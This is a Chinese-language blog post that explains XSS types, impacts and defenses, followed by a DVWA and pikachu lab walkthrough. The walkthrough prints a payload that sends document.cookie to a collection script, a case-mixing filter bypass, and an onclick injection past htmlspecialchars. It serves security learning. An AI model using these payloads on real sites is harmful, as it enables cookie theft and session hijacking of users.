xss 漏洞分析

最新推荐文章于 2024-11-15 20:41:39 发布
最新推荐文章于 2024-11-15 20:41:39 发布
阅读量144 收藏 2
点赞数 1
文章标签: xss 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rnn0921/article/details/132317792
版权

1 ,漏洞简介

  1. XSS 的原理 跨站脚本攻击 XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS。恶意攻击者往 Web 页面里插入恶意 Script 代码,当用户浏览该页面时,嵌入 Web 里面的 Script 代码会被执行,从而达到恶意攻击用户的目的。XSS 攻击针对的是用户层面的攻击!

  2. 分类 XSS 分为:存储型 、反射型 、DOM 型 XSS 存储型 XSS:存储型 XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,插入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种 XSS 比较危险,容易造成蠕虫,盗窃 cookie 反射型 XSS:非持久化,需要欺骗用户自己去点击链接才能触发 XSS 代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。反射型 XSS 大多数是用来盗取用户的 Cookie 信息。 DOM 型 XSS:不经过后端,DOM-XSS 漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞,DOM-XSS 是通过 url 传入参数去控制触发的,其实也属于反射型 XSS

2 ,漏洞影响范围

  1. Web 应用程序:XSS 漏洞主要影响 Web 应用程序,特别是那些允许用户输入和显示内容的网页应用程序。如果开发人员没有正确过滤或转义用户输入的数据,攻击者可以插入恶意脚本代码,并在受害者浏览器中执行。

  2. 受害者浏览器:XSS 漏洞通过操纵 Web 应用程序输出到受害者浏览器的 HTML 或 JavaScript 代码来实施攻击。一旦受害者浏览器加载了带有恶意脚本的页面,攻就可以执行作,如窃取用户信息、篡改页面内容或进行其他恶意活动。

  3. 用户:任何与受影响的 Web 应用程序交互

3 ,漏洞详解

xss 攻击通过注入恶意脚本到受害者的浏览器中执行,从而实施攻击

  1. 漏洞原理:XSS 漏洞发生在 Web 应用程序未正确对用户输入进行验证、过滤或转义,导致恶意脚本可以被插入到动态生成的 HTML 页面中,当其他用户访问该页面时,恶意脚本会在其浏览器中执行。

  2. 攻击类型:

    • 反射型 XSS:攻击者将恶意脚本作为参数或数据提交给 Web 应用程序,然后服务器将这些恶意内容回显到响应页面,如果用户点击包含恶意脚本的链接,则恶意脚本会在其浏览器中执行。

    • 存储型 XSS:攻击者将恶意脚本存储在 Web 应用程序的数据库或其他持久性存储中,然后其他用户在浏览相关内容时,服务器会将存储的恶意脚本返回给他们的浏览器,从而执行攻击。

  3. 攻击影响:

    • 数据窃取:攻击者通过 XSS 可以窃取受害者的敏感信息,如登录凭据、Cookie 数据或其他个人隐私信息。 会话劫持:攻击者可以利用 XSS 漏洞获取受害者的会话信息,以伪装成受害者,并执行某些操作。

    • 网站篡改:攻击者可以通过注入恶意代码来更改网站内容、插入广或钓鱼页面。

  4. 防御措施:

    • 输入验证和过滤:对用户输入数据进行有效验证和过滤,确保不包含恶意脚本。

    • 输出转义:在将用户数据插入到 HTML 或 JavaScript 代码之前,使用适当的编码/转义,可以防止被解析为可执行代码。

    • 安全编码实践:采用安全的开发实践,如使用 Web 框架或库提供的安全方法。

    • 内容安全策略(CSP):实施 CSP 可以帮助限制浏览器中可执行的内容来源,用于防止 XSS 攻击。

实例

dvwa

反射性 xss:

获取 cookie 值

 

 存储型(持久型),每次进入页面或者刷新都会被执行

 

内容被存储

 DOM 型 XSS

将English修改为ch

 

 

pikachu

cookie 获取

 

反射 get 型 xss

  • 首先在 pikachu 的 xss(get)请求中构造 payload <script>document.location='http://pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

 输入框长度受限,修改到 200000,然后输入 payload,提交

 

提交成功后进入 pkxss 后台查看获取的 cookie

 反射 post 型 xss

使用反射型 xss(post),可以看到数据是以 post 的形式传递在请求体中

 构造 form 表单

 构造 url,让登录用户点击 url,提交表单,获取 cookie,从而拿到用户的登录名和密码

 存储型 xss

提交以后有弹框,下次打开自动弹框

 

 xss 绕过

script标签大小写绕过

<ScRipt>alert(666)</ScRipt>

 

 htmlspecialcharts

后端使用 htmlspecialcharts 对输入的特殊字符进行过滤但是对'不过滤

构造 payload

x' οnclick='alert(9999)'

 

宁可123
关注
XSS漏洞分析
qq_50646296的博客
07-28 1827
一个挖漏洞项目,可以将它的hook.js通过XSS的方法被存储到某个网站,然后那个网站只要访问这个页面信息,那么整个网站就被监控了。此时查看设备已经在线,可以看到已经拿到了服务端那里的cookie,并且可以任意修改网站的配置文件,危害十分巨大。XSS代码被存储到服务器上的数据库里的某张表的字段里,或者页面,或者某个上传文件里,此类危害最大。里插入恶意JS代码,当用户浏览该页之时,嵌入其中Web里面的JS代码执行,从而。利用我们所知道的各种黑魔法,向Web页面插入JS代码,让JS代码可以被浏览器执行,.
GMail XSS 漏洞分析
neal1991的专栏
11-20 1310
原文:https://research.securitum.com/xss-in-amp4email-dom-clobbering/ 译者:https://github.com/neal1991 这篇文章是我在2019年8月通过 Google 漏洞奖励计划报告的 AMP4Email 中已经修复的 XSS 的文章。该 XSS 是对著名浏览器问题 DOM Clobbering 的真实利用案例。 ...
3-6POST方式下的XSS漏洞
山兔的博客
04-23 1885
这边有个靶场,我们直接登录一下,这边的提交以post方式提交 我们可以看到,他并没有在url里面来传这个参数,我们看一下抓包 我们可以看到message是通过post方式传到后台的,这种情况下,我们没有办法把我们的恶意代码嵌入到url里面,发送给目标 POSTXSS的利用:cookie获取 在post方式下,我们没有办法发送url,让客户去帮我们提交表单,我们首先可以自己搭一个恶意站点,然后在里面写一个post表单,我们可以把这个表单的链接,发送给用户,让他去点击,他一旦访问post页面,这个页面,
Day54:WEB攻防-XSS跨站&Cookie盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架
qq_61553520的博客
03-29 1540
小迪安全-Day54:WEB攻防-XSS跨站&Cookie盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架
xss劫持 HTML 表单,XSS 之 form表单劫持(通用明文记录)
weixin_34217656的博客
07-02 1662
【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】很多时候大家可能某一时刻特别想知道管理员的密码,就算你拿下webshell了,数据库的密码也是加密的,解开超级麻烦,那么你就需要试试xss这个插件了。【form表单劫持(通用明文记录)】个人觉得把这个XSS 放入jquery当后门用真心不错。。。就算管理员清除了网站木马后门,这个不一定能发现并清除。首先说一下对应名称...
xss 表单劫持(from通用明文记录)
weixin_34258078的博客
04-10 1221
大家都知道,在提交form表单调用onsubmit方法,既然调用了onsubmit,说明表单中该填的项肯定都已经填好了,这时,我们通过修改onsubmit方法,便可以获取表单中的信息.xss.js:varf=document.forms['from1']; if(f==undefined) { f=document.getElementById('');...
XSS跨站脚本】存储XSS持久
08-23 1828
XSS跨站脚本】存储XSS
Metinfo 6.1.3 XSS漏洞分析
BerL1n
12-29 639
time: 2019-04-11 21:11 文章首发于安全客,Metinfo 6.1.3 XSS漏洞分析 前言 前段时间看到一个cms造成的xss漏洞,这里想分析下。这个漏洞是metinfo6.1.3版本因参数问题造成前台和后台引起了两处xss漏洞。 这个漏洞的影响范围一直到最新版本(6.1.3),因为前段时间爆出的漏洞,所以新版本应该已修复。 cms最新6.13下载地址:https://www.mituo.cn/download/ 前台漏洞分析( CVE-2018-20486) 通过在前台插入xss..
前端顽疾--XSS漏洞分析与解决.ppt
05-07
前端顽疾--XSS 漏洞分析与解决 一、前端顽疾--XSS 漏洞分析 XSS 漏洞是一种常见的前端安全问题,指的是攻击者在 Web 应用程序中注入恶意脚本,以欺骗用户或窃取用户信息。XSS 漏洞的危害非常高,黑客可以通过 XSS ...
JSP使用过滤器防止Xss漏洞
10-17
在Web开发中,XSS(Cross-site scripting)漏洞是一种常见的安全威胁,允许攻击者通过注入恶意脚本到网页中,从而影响用户浏览器的行为。JSP(JavaServer Pages)作为常用的服务器端动态网页技术,同样需要关注XSS...
xss漏洞分析
qq_43814486的博客
05-08 552
xss名字来源: xss又叫跨站脚本攻击,英文(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)混淆,所以将跨站脚本攻击命名为XSS。 其实xss叫”跨站脚本攻击“ 这个名字很随意,仅仅是因为最开始时黑客们演示xss漏洞的时候用的是“跨站”的植入脚本这种方式,所以才叫这个名,现在浏览器都默认执行“同源策略”,xss漏洞很难再去...
解决提交表单Xss攻击的问题
Carson的专栏
09-04 7878
之前一直做内网系统,都是局域网,对安全问题一直考虑不周。 有一天对自己线上的表单做了一个测试,将&lt;script&gt;alert("xxx")&lt;/script&gt;作为表单选项提交,在后台回显时,可想而知,后台弹出了一个alert("xxx")的巨大的bug。 ------------------------------------- 修改了Xss攻击时的问题,改成了一个过滤器...
通过组合Self-XSS + CSRF得到存储XSS
zkaqlaoniao的博客
11-15 203
但是问题是这个功能配置并不是公共的,造成XSS漏洞的唯一方法是告诉受害者将其名称更改为恶意JavaScript代码,这称为Self-XSS,没有太大影响。回到XSSHunter,当任何用户打开我们的HTML表单时,平台获取到了目标cookie,由此我们可得到了一个Stored XSS(存储XSS)。现在,用户名更改为JavaScript代码后,浏览主页的代码将在目标的浏览器中加载,并向XSS hunter平台发送回cookie。在最后我添加了JavaScript自动提交表单,使其更有效。
Xss挑战(跨脚本攻击)
ming20211016的博客
11-13 1184
这里将script,on,src,data,href,进行了过滤,并且在尝试的时候关键字双写不能用了,那么这里直接选择不去闭合标签,直接使用伪协议,但是发现javascript也被拆开了,这里可以对伪协议中的字母进行转码。这里查看我们注入的代码是否有http://,如果包含则执行else中的语句,将我们构造的攻击代码输入到href中,如果不包含则在a标签中的href显示指定字符串。源码中将script,on,src,data,href标签及属性转换为空。
sanitize-html 防止 XSS(跨站脚本攻击)
qq505751223的博客
11-12 344
是一个用于清理和验证 HTML 的 JavaScript 库,主要用于防止 XSS(跨站脚本攻击)。它允许你定义一套规则来决定哪些 HTML 标签和属性是可以被信任的,从而确保用户输入的内容不包含潜在的恶意代码
【SpringBoot】使用过滤器进行XSS防御
morris
11-15 193
在Spring Boot中,我们可以使用注解的方式来进行XSS防御。注解是一种轻量级的防御手段,它可以在方法或字段级别对输入进行校验,从而防止XSS攻击。 而想对全局的请求都进行XSS防御可以使用servlet中的过滤器或者spring mvc中的拦截器,这里使用servlet中的过滤器进行演示。
windows二进制安全零基础(二)
最新发布
zhuqiyua的博客
11-15 558
在x86架构中,栈(Stack)是一个非常重要的内存区域,它用于支持线程的短期数据需求,如函数调用、局部变量存储和程序控制信息。
等保二级需要哪些安全设备?
bocco的博客
11-15 340
同时,还应加强安全管理措施的实施,提高员工的安全意识和能力,共同维护企业的信息安全。这些设备能够实时监测机房内的温湿度、漏水情况,一旦超出预设范围,便自动报警,及时采取措施,确保服务器在适宜的环境中稳定运行。1. 防火墙:防火墙是网络安全的第一道屏障,能够控制进出网络的数据包,防止未经授权的访问和恶意攻击。在等保二级中,应部署下一代防火墙,其不仅具备传统防火墙的功能,还集成了入侵防御、防病毒等功能,能够更有效地保护服务器的安全。通过部署日志审计系统,可以及时发现并处理网络中的异常行为,提高网络的安全性。
Catfish(鲶鱼) Blog V1.3.15 存储XSS漏洞分析
"Catfish(鲶鱼) Blog V1.3.15存在存储XSS漏洞,攻击者可以通过在评论区输入恶意脚本,导致用户在查看评论时执行XSS攻击。" 在讨论这个安全问题之前,让我们先了解一下XSS(Cross-Site Scripting)的概念。XSS是一...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值